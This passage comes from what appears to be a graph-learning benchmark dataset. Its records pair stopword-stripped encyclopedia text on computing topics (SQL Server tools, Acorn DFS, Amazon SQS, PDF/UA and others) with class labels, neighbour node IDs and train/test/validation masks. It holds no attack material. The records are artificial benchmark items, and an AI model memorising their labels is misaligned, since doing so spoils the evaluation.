olap data mining capabilities sql server databases olap engine supports molap rolap holap storage modes data analysis services supports xml analysis standard underlying communication protocol cube data accessed using mdx linq queries data mining specific functionality exposed via dmx query language analysis services includes various algorithms—decision trees clustering algorithm naive bayes algorithm time series analysis sequence clustering algorithm linear logistic regression analysis neural networks—for use data mining sql server reporting services report generation environment data gathered sql server databases administered via web interface reporting services features web services interface support development custom reporting applications reports created rdl files reports designed using recent versions microsoft visual studio visual studio.net 2003 2005 2008 business intelligence development studio installed included report builder created rdl files rendered variety formats including excel pdf csv xml bmp emf gif jpeg png tiff html web archive originally introduced post-release add-on sql server 2000 notification services bundled part microsoft sql server platform first time sql server 2005 sql server notification services mechanism generating data-driven notifications sent notification services subscribers subscriber registers specific event transaction registered database server trigger event occurs notification services use one three methods send message subscriber informing occurrence event methods include smtp soap writing file filesystem notification services discontinued microsoft release sql server 2008 august 2008 longer officially supported component sql server database platform sql server integration services ssis provides etl capabilities sql server data import data integration data warehousing needs integration services includes gui tools build workflows extracting data various sources querying data transforming data—including aggregation de-duplication de-/normalization merging data—and exporting transformed data destination databases files sql server full text search service specialized indexing querying service unstructured text stored sql server databases full text search index created column character based text data allows words searched text columns performed sql codice_8 operator using sql server full text search service efficient full allows inexact matching source string indicated rank value range 0 1000—a higher rank means accurate match also allows linguistic matching inflectional search i.e. linguistic variants word verb different tense also match given word lower rank exact match proximity searches also supported i.e. words searched occur sequence specified query near also considered match t-sql exposes special operators used access fts capabilities full text search engine divided two processes filter daemon process codice_9 search process codice_10 processes interact sql server search process includes indexer creates full text indexes full text query processor indexer scans text columns database also index binary columns use ifilters extract meaningful text binary blob example microsoft word document stored unstructured binary file database ifilters hosted filter daemon process text extracted filter daemon process breaks sequence words hands indexer indexer filters noise words i.e. words like etc. occur frequently useful search remaining words inverted index created associating word columns found sql server includes gatherer component monitors changes tables invokes indexer case updates full text query received sql server query processor handed fts query processor search process fts query processor breaks query constituent words filters noise words uses inbuilt thesaurus find linguistic variants word words queried inverted index rank accurateness computed results returned client via sql server process sqlcmd command line application comes microsoft sql server exposes management features sql server allows sql queries written executed command prompt also act scripting language create run set sql statements script scripts stored codice_11 file used either management databases create database schema deployment database sqlcmd introduced sql server 2005 continues sql server 2012 2014 2016 predecessor earlier versions osql isql functionally equivalent pertains tsql execution many command line parameters identical although sqlcmd adds extra versatility microsoft visual studio includes native support data programming microsoft sql server used write debug code executed sql clr also includes data designer used graphically create view edit database schemas queries created either visually using code ssms 2008 onwards provides intellisense sql queries well sql server management studio gui tool included sql server 2005 later configuring managing administering components within microsoft sql server tool includes script editors graphical tools work objects features server sql server management studio replaces enterprise manager primary management interface microsoft sql server since sql server 2005 version sql server management studio also available sql server express edition known sql server management studio express ssmse central feature sql server management studio object explorer allows user browse select act upon objects within server used visually observe analyze query plans optimize database performance among others sql server management studio also used create new database alter existing database schema adding modifying tables indexes analyze performance includes query windows provide gui based interface write execute queries sql server operations studio preview cross platform query editor available optional download tool allows users write queries export query results commit sql scripts git repositories perform basic server diagnostics sql server operations studio supports windows mac linux systems business intelligence development studio bids ide microsoft used developing data analysis business intelligence solutions utilizing microsoft sql server analysis services reporting services integration services based microsoft visual studio development environment customized sql server services-specific extensions project types including tools controls projects reports using reporting services cubes data mining structures using analysis services sql server 2012 later ide renamed sql server data tools ssdt",
    "neighbors": [
      5120,
      9729,
      3,
      6147,
      3080,
      8201,
      9224,
      1035,
      1549,
      9234,
      2068,
      4116,
      1560,
      1049,
      5658,
      8227,
      5669,
      8230,
      4135,
      4647,
      5673,
      3629,
      6190,
      9263,
      10286,
      3636,
      5173,
      6709,
      8246,
      8757,
      9268,
      9780,
      5691,
      9789,
      10302,
      4674,
      9286,
      6219,
      8781,
      4174,
      83,
      10326,
      4183,
      4696,
      603,
      7771,
      5727,
      608,
      7776,
      4194,
      10338,
      8804,
      9828,
      10340,
      10342,
      617,
      5738,
      2669,
      1135,
      6770,
      119,
      3704,
      6775,
      1146,
      5242,
      5754,
      6780,
      10873,
      639,
      11392,
      8835,
      9348,
      5765,
      2183,
      5768,
      9867,
      6797,
      10900,
      10389,
      10902,
      11414,
      3224,
      2727,
      4263,
      8871,
      6827,
      3757,
      4781,
      8878,
      10413,
      2737,
      9397,
      1719,
      10939,
      4289,
      3784,
      5320,
      5832,
      4811,
      9420,
      10956,
      10957,
      6359,
      3800,
      7895,
      9434,
      10459,
      2780,
      736,
      1250,
      8419,
      3303,
      10471,
      11498,
      3821,
      6383,
      10991,
      242,
      3827,
      2804,
      7412,
      8434,
      7930,
      11515,
      7932,
      8448,
      7426,
      2819,
      4356,
      11524,
      1801,
      9481,
      270,
      782,
      8976,
      8979,
      5910,
      7446,
      1816,
      5401,
      10518,
      3867,
      5403,
      11549,
      6943,
      4384,
      11551,
      6434,
      7970,
      10020,
      2854,
      11559,
      1832,
      2344,
      7983,
      3890,
      10546,
      9012,
      11570,
      3894,
      823,
      11571,
      9530,
      315,
      6972,
      11581,
      7486,
      10048,
      5953,
      1347,
      1348,
      9033,
      11085,
      847,
      6993,
      853,
      1366,
      2901,
      3414,
      8536,
      11093,
      11605,
      8028,
      2910,
      11103,
      864,
      2401,
      2402,
      7523,
      1383,
      6507,
      2413,
      7022,
      9585,
      5491,
      8052,
      9075,
      9593,
      3965,
      2943,
      2944,
      5504,
      10624,
      899,
      11136,
      11651,
      10632,
      1935,
      5523,
      1943,
      2456,
      4505,
      7064,
      7576,
      9112,
      10137,
      9631,
      2465,
      9634,
      11683,
      7588,
      6565,
      7080,
      4010,
      8619,
      1964,
      5549,
      10157,
      1459,
      3507,
      8627,
      10675,
      11191,
      9144,
      10681,
      3004,
      1474,
      8644,
      5061,
      969,
      10699,
      2512,
      10193,
      2002,
      4051,
      11221,
      4056,
      9177,
      4058,
      987,
      4572,
      10201,
      479,
      5600,
      4065,
      3042,
      8161,
      3045,
      7654,
      8681,
      4074,
      6124,
      2544,
      5104,
      10737,
      3573,
      9205,
      8188,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 11031,
    "label": 2,
    "text": "Userful:userful userful corporation canadian software company specializes video walls digital signage interactive displays desktop virtualization founded 2003 userful develops software turns standard pc high end video wall controller video wall processor userful head office located calgary alberta privately held for-profit company resellers around world founder chief technology officer timothy griffin founded userful corporation 2003 company commenced work multi-screen desktop computing platform core userful software first userful software release 2002 quickest market uptake low cost approach desktop virtualization schools public libraries locations needed locked virtual desktops military oilfields deployment 2014 userful launched video wall digital signage software built pc network zero client infrastructure desktop virtualization product october 2018 userful named john marshall new chief executive officer february 2009 userful announced claimed world largest desktop virtualization deployment 356,800 virtual desktops brazil may 2012 userful launched version 5 multiseat software added ethernet zero client support april 2012 userful announced partnership viewsonic produce linux-based zero-client product february 2013 userful launched userful multiplatform 6 enables running windows linux browser desktops multiseat environment february 2014 userful launched userful multiplatform 7.0 provides desktop virtualization central management desktops touch screens kiosks october 2014 userful partnered viewsonic create sc-u25 value vdi client userful multiplatform software december 2014 userful launched userful network video wall software turns standard pc video wall controller video wall processor supports ultra-high definition content one core i7 pc multiple video walls 25 standard displays august 2015 version 8.0 userful network video wall released updating core platform userful products improving performance reliability january 2016 version 8.5 userful released updating core platform include core enhancements enhanced support features vdi video walls may 2016 version 8.6 userful released update supports 8k video walls including enhanced features support vdi video walls september 2016 userful released version 8.7 featuring enhancements minor updates december 2016 userful released version 9.0 added many interactive features enhancements video walls digital signage see list userful software products built combination centos linux userful ’ software provisions manages zero clients userful software turns standard pc video wall controller video wall processor delivers content gigabit ethernet network userful software utilizes cpu gpu intel platform process render high resolution real time content release userful network video wall december 2014 world first commercially available video wall solution deliver real-time 4k content standard ethernet network one pc january 2016 userful updated video wall solution world first network video wall capable 6k source content real time ability support 40 screens one standard pc 60 screens high-end pc userful merged virtual desktop platform 8.5 release enabling delivery virtual desktops video wall userful also announced support multi-zone configurations allowing video wall broken sections different real time content played different zones within video wall may 2016 userful released version 8.6 improving display quality use discrete compatible gpus announced support 8k video content playback december 2016 userful launched version 9.0 increased number screens supported 1 pc 100 release also included interactivity tools ability store invoke presets change content zone configurations fly userful multiplatform multiseat desktop virtualization product works oracle virtualbox enable creation management multiple windows linux cloud desktops commercially available hardware userful desktop combines customized configurable gnome desktop managed remotely in-house tools product specifically designed full public computing solution kiosks public access computers desktop settings managed session profiles created stored central web portal pre-book open source pc reservation system originally client software userful/linux windows however opensource windows software since discontinued pre-book feature available people using userful platform public computing wanting advance reservations multi-location time management available cloud subscription feature starting release 8.5 userful ’ desktop virtualization video wall features joined single platform offers virtual desktops video wall digital signage solutions starting release 8.9 public computing features userful desktop pre-book also merged unified platform called userful userful multiseat linux replaced userful multiplatform software turns one linux computer 20 independent computer stations includes educational applications userful multiseat linux software linux-based equivalent windows multipoint server multiseat solutions education sector userful multiseat formerly userful multiplier commercial linux-based multiseat configuration software package allows multiple independent users connect single host pc time monitor keyboard mouse applications",
    "neighbors": [
      4194,
      9438
    ],
    "mask": "Test"
  },
  {
    "node_id": 11032,
    "label": 9,
    "text": "Logic_for_Computable_Functions:logic computable functions logic computable functions lcf interactive automated theorem prover developed universities edinburgh stanford robin milner others 1972 lcf introduced general-purpose programming language ml allow users write theorem-proving tactics theorems system terms special theorem abstract data type ml type system ensures theorems derived using inference rules given operations abstract type successors include hol higher order logic isabelle",
    "neighbors": [
      10049,
      8262,
      11026,
      11028,
      3929,
      7386
    ],
    "mask": "Test"
  },
  {
    "node_id": 11033,
    "label": 6,
    "text": "Disc_Filing_System:disc filing system disc filing system dfs computer file system developed acorn computers initially add-on eurocard-based acorn system 2 1981 education departments western australia south australia announced joint tenders calling supply personal computers schools acorn australian computer distributor barson computers convinced joint managing directors hermann hauser chris curry allow soon released acorn bbc microcomputer offered disk storage part bundle agreed condition barson adapted acorn dfs system 2 without assistance acorn resources available required minor hardware software changes make dfs compatible bbc micro barson tenders states dfs fitted year ahead uk early initiative resulted bbc micro heavily focused education market australia little penetration home computer market arrival acorn electron dfs shipped rom disk controller chip fitted bbc micro motherboard filing system extremely limited functionality storage capability using flat directory structure filename seven letters long plus one letter directory file stored dfs remarkable unlike filing systems single vendor implementation original dfs written acorn continued maintain codebase various disc drive vendors wrote implementations companies wrote dfs implementations included cumana opus watford electronics watford electronics implementation notable supporting 62 files per disc instead usual 31 using non-standard disc format features third-party implementations included able review free space built-in codice_1 codice_2 commands shipped utility disc original acorn dfs acorn followed original dfs series acorn 1770 dfs used disc format earlier version added set extra commands supported improved wd1770 floppy drive controller chip dfs conventionally uses one side double-density 5¼ floppy disc discs formatted either 40 80 track giving capacity 100 200 kb per side ten 256-byte sectors per track fm encoding capacity limited choice intel 8271 controller original bbc micro supports fm encoding mfm encoding already common use time bbc micro launch fm encoding gives half recording capacity mfm given physical disc density fm mfm encoding commonly referred single density double density although discs drives unlike high density uses different drives discs double-density 3½ discs formatted used 1770 dfs intel 8271-based dfs problems many 3½ drives giving single-density capacity fm encoding originally standard practice 3½ discs normally formatted mfm double density using later advanced disc filing system present acorn machines supplied 3½ drives 2009 3½ drives commonly used bbc micros past including use dfs due greater availability easier data interchange recent computers high-density 5¼ 3½ discs supported dfs dfs directly support double-sided discs instead two heads double-sided drive treated two separate logical drives dfs support four volumes numbered 0 3 drive 0 default drive 1 representing second drive attached cable drive 2 referred reverse side drive 0 drive 3 reverse drive 1 support two physical drives due installed base single-sided drives commercial software normally provided single-sided discs flippy discs manually reversed access side discs formatted using 40 80 tracks using codice_3 codice_4 commands drives either 40 80 track common compatibility issue dfs users 40-track discs norm commercial software distribution due installed base 40-track drives 80-track drives became common prices dropped allowing users store data 80-track drive automatically read 40-track discs disc capacity stored sector count catalogue track zero track zero located place 40- 80-track discs allowing disc file system set motor stepping accordingly however intel 8271-based acorn dfs dual-format capability addressed number ways failure use correct setting would result errors dfs codice_5 damage disc drive trying step heads beyond physical end disc surface switching 80 tracks extend catalogue way leaving user prone running filename slots running space disc situation resulted codice_6 error dfs case-preserving case-sensitive prevalence all-capitals filenames likely due bbc micro defaulting caps lock enabled hard soft reset character set quite permissive printable characters 7-bit ascii allowed including spaces excluding sake portability third-party dfs implementations best avoid codice_12 codice_16 leaf names quotation marks allowed although bbc basic requires escaped twice fully qualified filename file specification fsp short contains colon drive number dot directory letter another dot name example file default directory drive 2 called codice_31 would complete specification codice_32 drive directory specifiers optional directories dfs single character prefixes filenames codice_21 codice_34 used group files arrangement flat default directory codice_35 used instead root directory requesting catalogue disc codice_36 codice_37 commands files current directory shown directory prefix one block listed files second block directory prefixes visible example acorn dfs third party dfs implementations may vary slightly top seven files current directory codice_35 drive 0 files directories case codice_39 codice_40 codice_21 codice_42 filename codice_43 shows file locked modification deletion first line contains disc title modification count dfs provides working space divided directory library directory working directory current volume much like working directory command line system library second alternative working directory functions like path benefit able volume requests open files unqualified names first searched working directory failing library directory also searched directory library default directory catalogue file table occupies first two disc sectors one names directories file matching sector holding file locations sizes metadata eight bytes sector used file eight bytes sector reserved 12-byte disc title volume information total number files disc irrespective directory file limited 31 interests saving space significant bit directory letter file used locked read-only flag although physical disks usually formatted either 100 kb 200 kb dfs supports volume sizes 256 kb largest dfs file size allowed volume size minus ½ kb catalogue file sizes stored 18-bit quantity dfs support data fragmentation meaning file data must stored single run consecutive sectors free space prone becoming fragmented random-access file writes fail end file reaches beginning next even though may free sectors elsewhere disc cases dfs aborts codice_44 error codice_45 split file fit available space either failure occurs sector allocation stage error returned codice_46 codice_47 command provided relocate files disc solid block placing free space second block allows next file created fill disc last existing file extended without moved codice_45 virtually deletes existing file copies specified block memory wherever space disc contrast codice_47 command uses program memory buffer relocate files overwriting program data memory like cassette filing system acorn dfs supports bbc micro standard file metadata load address execution address required acorn mos operating system used bbc micro support relocation binary code file loaded address programmer intended contents may refer internal locations absolute addresses execution address also recorded entry point necessarily beginning even within file file attributes limited single bit locked set codice_42 appears right file name catalogue file may altered overwritten deleted dfs discs track dates acorn mos prior version 3 maintain real-time clock instead offer peculiar feature modification count every time catalogue updated count increments count shown parentheses title first line disc catalogue codice_51 catalogue listing shown earlier dfs also supports means start disc software based key sequence shift key held machine soft hard reset dfs checks drive 0 disc containing positive boot flag boot flag either 0 ignore 1 load file 2 run machine code file 3 execute script boot flag positive file called codice_52 looked loaded memory 1 loaded executed machine code 2 fed keyboard buffer 3 option 3 reads exec files text macro files used primitive shell scripts true shell scripts simply series keys typed like recording play back thus loop branch unless input code basic interpreter well used reset executed time operating system codice_53 command exec files file system independent variant dfs called dnfs disc/network filing system contained econet network filing system nfs standard disc filing system tube co-processor support software single rom rom installed two filing systems os initial design dfs based around intel corporation fdc 8271 disc drive controller immediate predecessor 8272 design found ibm personal computer 8271 controller limited functionality obsolete later versions file system various vendors including solidisk acorn watford electronics based later wd1770 wd1772 drive controllers 1770 controller quickly became standard controller acorn range following advent adfs dfs superseded advanced disc filing system adfs fully hierarchical suitable running hard drives bbc micro adfs default filing system bbc master users likely reverted dfs compatibility reasons adfs could read dfs discs adfs also chosen standard filing system risc os",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      10862,
      9333,
      6263,
      9335,
      11384,
      2687,
      9343,
      3722,
      7818,
      654,
      2193,
      2194,
      10387,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      8429,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      1790,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      10068,
      346,
      2395,
      2397,
      6499,
      10596,
      2407,
      10087,
      2933,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      5043,
      7603,
      8631,
      1464,
      3512,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11034,
    "label": 9,
    "text": "LEGO_(proof_assistant):lego proof assistant lego proof assistant developed randy pollack university edinburgh implements several type theories edinburgh logical framework lf calculus constructions coc generalized calculus constructions gcc unified theory dependent types utt",
    "neighbors": [
      6070,
      4791
    ],
    "mask": "Test"
  },
  {
    "node_id": 11035,
    "label": 1,
    "text": "Liberian_companies:liberian companies companies republic liberia regulated variety laws corporate laws liberia promulgated 50 years ago provide offshore jurisdiction ship owners international financial community liscr liberian international ship corporate registry appointed government liberia agent manage corporate registry act sole registered agent corporations registered liberia place business elsewhere corporate registry managed liscr located dulles virginia us office zurich switzerland two income tax treaties sweden germany force additionally liberia corporate jurisdiction oecd ’ white-list countries substantially implemented tax transparency meet internationally agreed tax standard liberian registry – second largest world – includes 4,300 ships 160 million gross tons accounts 12 percent world ’ oceangoing fleet liberian fleet one youngest nations average vessel age 12 years according u.s. maritime administration liberian-flagged vessels carry one-third oil imported united states liberian registry administered liberian international ship corporate registry liscr llc u.s. owned operated company provides day-to-day management republic liberia rol ship corporate registry addition regional offices many major maritime centers world liberian registry also supported worldwide network 400 nautical inspectors auditors liberian registry open ship owner world order enter liberian registry vessel must less 20 years age must meet high safety standards liberian flagged ships able trade anywhere world crew nationality restrictions taxes liberian vessels conservative rates based net tonnage registration vessels eligible liberian entities registered business entities incorporated jurisdictions registered liberian foreign maritime entity liberian corporations llcs partnerships not-for-profit businesses easily formed special documents required submitted order form confirming details entity requested however accept formation instructions professional user offshore corporations including ship managers manning agents ship owners etc. well trust company managers lawyers accountants investment companies etc accept instructions directly individuals engaged professionally company management acting professional advisor lawyer articles incorporation include minimum name corporation purpose corporation type shares total authorized share capital name incorporator names subscribers shares number initial directors directors shareholders officers need registered liberia thus possible obtain public record form evidence directors shareholders officers particular feature makes administration liberian company particularly simple offshore trust companies unfortunately sometimes create difficulties liberian company enter contract since counter-party must follow paper trail ensure dealing duly elected officials company purpose liberian corporations voluntarily file information needed conduct business liberian companies shall keep correct complete books records account shall keep minutes meetings shareholders actions taken consent shareholders meetings board directors actions taken consent directors meetings executive committee requirement file information public register instead corporation responsible safekeeping records requirement audited accounts liberian corporation decision audit accounts one shareholders take costs 713.50 register company liberia annual registration fee 450.00 requirement company director physically present liberia time capital investment requirements start liberian company maintain non-resident domestic corporation status least 75 previously 50 company shares share subscription rights must owned controlled non-residents liberia liberia special bank secrecy laws like tax havens deterrent liberian offshore corporations actually handle banking transactions within liberia ’ territory borders moreover requirement must bank liberia certified copies filed corporate records available order public",
    "neighbors": [
      3090
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11036,
    "label": 9,
    "text": "PDF/UA:pdf/ua pdf/ua pdf/universal accessibility informal name iso 14289 international standard accessible pdf technology technical specification intended developers implementing pdf writing processing software pdf/ua provides definitive terms requirements accessibility pdf documents applications equipped appropriate software conformance pdf/ua ensures accessibility people disabilities use assistive technology screen readers screen magnifiers joysticks technologies navigate read electronic content february 18 2015 us access board announced proposed rule us federal policy accessibility commonly known section 508 proposed rule identifies pdf/ua equivalent wcag 2.0 appropriate content pdf/ua separate file-format simply way use familiar pdf format invented adobe systems standardized iso 32000 general pdf/ua requires tagged pdf iso 32000-1 14.8 adds variety qualitative requirements especially regarding semantic correctness tags employed pdf/ua complements wcag 2.0 used make pdf files also conform wcag 2.0 2014 update pdf/ua published december 2014 first fully accessible standard iso ever published pdf file distributed iso conforms pdf/ua formal name pdf/ua iso 14289-1 document management applications -- electronic document file format enhancement accessibility -- part 1 use iso 32000-1 pdf/ua-1 pdf/ua specification written software developers pdf/ua support interest persons disabilities require benefit assistive technology reading electronic content pdf/ua conforming files readers assistive technology users guaranteed – far pdf format provide – equal access information benefits pdf/ua extend beyond people disabilities support pdf/ua reader software able reliably reflow text onto small screens provide powerful navigation options transform text appearance improve search engine functionality aid selection copying text pdf/ua project began 2004 aiim standards committee pdf/ua wiki operated aiim contains agendas meeting-minutes public-access documents pertaining development pdf/ua chaired since 2005 duff johnson 2009 aiim pdf/ua committee became u.s. committee iso/awi accepted work item 14289 cherie ekholm microsoft international project leader us committee continued main driver standard development wd cd dis fdis phases iso standards development review comment balloting member bodies iso tc 171 iso 14289-1:2012 pdf/ua published july 2012 minor update iso 14289-1:2014 published december 2014 document available directly iso webstore october 2012 us library congress added pdf/ua list archivable file formats loc guidance states pdf/ua ... preferred format page-oriented content library congress adobe systems largest implementer interactive pdf software announced intention support pdf/ua december 2014 iso published iso 14289-1:2014 minor revision original 2012 document march 2016 aiim ansi published pdf/ua american national standard aiim us committee pdf/ua published following documents support pdf/ua work iso 14289-2 pdf/ua-2 ongoing pdf/ua-2 based pdf 2.0 aiim us committee pdf/ua led development document 2004 2010 draft became iso nwi us iso committees maintain work aiim pdf standards wiki participation subject matter experts software developers interested parties invited encouraged pdf association helps promote pdf/ua variety ways 2011 pdf association created pdf/ua competence center way vendors develop educational resources share experiences regarding implementation pdf/ua matterhorn protocol see product pdf/ua competence center 2012 2013 pdf association helped raise money awareness nv access nvda development world first pdf/ua conforming screen reader august 2013 pdf association pdf/ua competence center published matterhorn protocol set 31 checkpoints 136 failure conditions help software developers make easier document authors create fully accessible pdf files forms june 2014 pdf association pdf/ua competence center published first iteration pdf/ua reference suite set reference-quality documents conforming pdf/ua-1. ref name= pdf/ua reference suite /ref december 2015 pdf association pdf/ua competence center unveiled first public draft tagged pdf best practice guide publication expected summer 2016 pdf association conducted numerous educational seminars pdf/ua throughout europe north america australia 2012 2013 book pdf/ua nutshell produced english german informational brochure also produced languages",
    "neighbors": [
      10752,
      8854,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      6977,
      8904,
      1610,
      9290,
      8524,
      2519,
      2904,
      4058,
      4064,
      8421,
      8426,
      5614,
      1010,
      3447,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 11037,
    "label": 2,
    "text": "DVD_Player_(Mac_OS):dvd player mac os dvd player formerly apple dvd player default dvd player macos supports standard dvd features multiple audio video subtitle tracks well dolby digital 5.1 passthrough dvd access urls closed captions instances users choose vob file open dvd player also fully compatible dvds authored dvd studio pro idvd including hd dvds dvd studio pro macos mojave updated 64-bit sports new icon better touch bar support dvd player complies copyright laws thus enforce restrictive measures dvd technology region-restrictive encodings user-inhibited operations disabled actions even using all-region dvd drive even force apple grab screen-grabbing program cease functioning finder interface dvd player application quit effectively preventing user taking screen captures visual dvd content software contain dts decoder dts tracks played mac built speakers analog output however dts tracks output devices decoder playback supported outputs s/pdif displayport hdmi",
    "neighbors": [
      1542,
      4615,
      3598,
      5647,
      1042,
      6700,
      4657,
      1074,
      1592,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      9358,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      213,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      4844,
      2288,
      753,
      7928,
      8441,
      3324,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      811,
      3371,
      7983,
      10036,
      11063,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      5520,
      9109,
      1439,
      6048,
      11171,
      8114,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      9700,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 11038,
    "label": 8,
    "text": "Amazon_Simple_Queue_Service:amazon simple queue service amazon simple queue service amazon sqs distributed message queuing service introduced amazon.com late 2004 supports programmatic sending messages via web service applications way communicate internet sqs intended provide highly scalable hosted message queue resolves issues arising common producer-consumer problem connectivity producer consumer amazon sqs described commoditization messaging service well-known examples messaging service technologies include ibm websphere mq microsoft message queuing unlike technologies users need maintain server amazon sells sqs service per-use rate amazon provides sdks several programming languages including java ruby python .net php javascript java message service jms 1.1 client amazon sqs released december 2014 amazon sqs provides authentication procedures allow secure handling data amazon uses amazon web services aws identification requiring users aws enabled account amazon.com created amazon web services aws cloud computing services aws assigns pair related identifiers aws access keys aws enabled account perform identification first identifier public 20-character access key key included aws service request identify user user using soap protocol ws-security digital signature calculated using secret access key secret access key 40-character private identifier aws uses access key id provided service request look account secret access key amazon.com calculates digital signature key match user considered authentic authentication fails request processed amazon sqs guarantees at-least-once delivery messages stored multiple servers redundancy ensure availability message delivered server available may removed server queue may resent amazon sqs guarantee recipient receive messages order sent sender message ordering important required application place sequencing information within messages allow reordering delivery messages type data contained within restricted message bodies initially limited 8kb size later raised 64kb 2010-07-01 256kb 2013-06-18 larger messages user options get around limitation large message split multiple segments sent separately message data stored using amazon simple storage service amazon s3 amazon dynamodb pointer data transmitted sqs message amazon made extended client library available purpose extension amazon sqs client enables sending receiving messages 2gb via amazon s3 awslabs/amazon-sqs-java-extended-client-lib service supports unlimited queues message traffic sqs automatically delete messages sent message delivered receipt handle generated delivery sent recipient receipts sent message addition sqs requires recipient provide receipt order delete message feature new 2008 message id required message deletion system distributed message may sent case recent receipt handle needed delete message message delivered visibility timeout prevent components consuming clock visibility timeout starts message sent default time 30 seconds queue told delete message time message becomes visible resent queue also consists retention parameter defaulting 4 days message residing queue longer purged automatically retention modified 1 minute 14 days user retention changed messages already queue message queue longer new retention purged dropbox netflix nextdoor examples companies use sqs extensively sqs also widely used within amazon.com first 1 million monthly requests free pricing follows regions date transfer price",
    "neighbors": [
      8962,
      8451,
      3462,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      5660,
      9245,
      6307,
      11556,
      9766,
      5159,
      2217,
      6444,
      5677,
      6522,
      8495,
      3121,
      7352,
      10681,
      2496,
      4289,
      11201,
      8644,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      7512,
      8921,
      1628,
      735,
      6367,
      4194,
      11646,
      5732,
      3558,
      1001,
      8554,
      3819,
      7660,
      10090,
      3573,
      8181,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11039,
    "label": 3,
    "text": "Exchange_to_exchange:exchange exchange exchange exchange sometimes exchange-to-exchange abbreviated e2e integration certain pairs computer systems qualify e2e paired systems must primary use acting exchange gateway among customers common example connection stock brokerage firms internal systems systems stock market broker trades connections often facilitated middleware services object request brokers e2e partner system primary function clients allowing transfer information conduct transactions form business business b2b commerce model e2e partner b2b gateway clients turn exchanges information least one b2b gateway connection two b2b systems exchanges exchange exchange integration e2e alternative direct application application integration a2a though a2a classified e2e",
    "neighbors": [
      8122,
      8100,
      8581
    ],
    "mask": "None"
  },
  {
    "node_id": 11040,
    "label": 8,
    "text": "WS-Federation_Active_Requestor_Profile:ws-federation active requestor profile ws-federation active requestor profile web services specification intended work ws-federation specification defines identity authentication authorization mechanisms work across trust realms specification deals specifically applications soap-enabled applications make requests using mechanisms way contrast ws-federation passive requestor profile deals passive requestors web-browsers ws-federation active requestor profile created ibm bea systems microsoft verisign rsa security",
    "neighbors": [
      10020,
      7878,
      2154,
      10486,
      3323,
      317
    ],
    "mask": "None"
  },
  {
    "node_id": 11041,
    "label": 7,
    "text": "Borg_(cluster_manager):borg cluster manager borg cluster manager used google led widespread use similar approaches docker kubernetes",
    "neighbors": [
      2834,
      4149,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 11042,
    "label": 0,
    "text": "MUSA_(MUltichannel_Speaking_Automaton):musa multichannel speaking automaton musa multichannel speaking automaton early prototype speech synthesis machine started 1975 consisted stand-alone computer hardware specialized software implemented diphone-synthesis technology one first real-time tts systems able read italian intellegibile robotic voice also sing managing 8 synthesis channels parallel thanks linear predictive coding technology 1978 released building working prototype 45 rpm audio disk containing trial content synthesis including song fra martino campanaro cappella multiple voices style attached commercial reviews experiment conducted cselt turin italy led giulio modena",
    "neighbors": [
      5362,
      3533
    ],
    "mask": "None"
  },
  {
    "node_id": 11043,
    "label": 0,
    "text": "Sliding_window_based_part-of-speech_tagging:sliding window based part-of-speech tagging sliding window based part-of-speech tagging used part-of-speech tag text high percentage words natural language words context assigned one part speech percentage ambiguous words typically around 30 although depends greatly language solving problem important many areas natural language processing example machine translation changing part-of-speech word dramatically change translation sliding window based part-of-speech taggers programs assign single part-of-speech given lexical form word looking fixed sized window words around word disambiguated two main advantages approach let set grammatical tags application set possible tags may assigned word let vocabulary application let function morphological analysis assigns formula_4 set possible tags formula_5 implemented full-form lexicon morphological analyser let set word classes general partition formula_7 restriction formula_8 words formula_9 receive set tags words word class formula_10 belong ambiguity class normally formula_11 constructed way high frequency words word class contains single word low frequency words word class corresponds single ambiguity class allows good performance high frequency ambiguous words n't require many parameters tagger definitions possible state problem following way given text formula_12 word formula_13 assigned word class formula_14 either using lexicon morphological analyser order get ambiguously tagged text formula_15 job tagger get tagged text formula_16 formula_17 correct possible statistical tagger looks probable tag ambiguously tagged text formula_18 using bayes formula converted formula_21 probability particular tag syntactic probability formula_22 probability tag corresponds text formula_23 lexical probability markov model probabilities approximated products syntactic probabilities modelled first order markov process formula_25 formula_26 delimiter symbols lexical probabilities independent context one form tagging approximate first probability formula formula_29 right context size formula_30 way sliding window algorithm take account context size formula_31 applications formula_32 example tag ambiguous word run sentence runs danger tags words needed taken account",
    "neighbors": [
      7780,
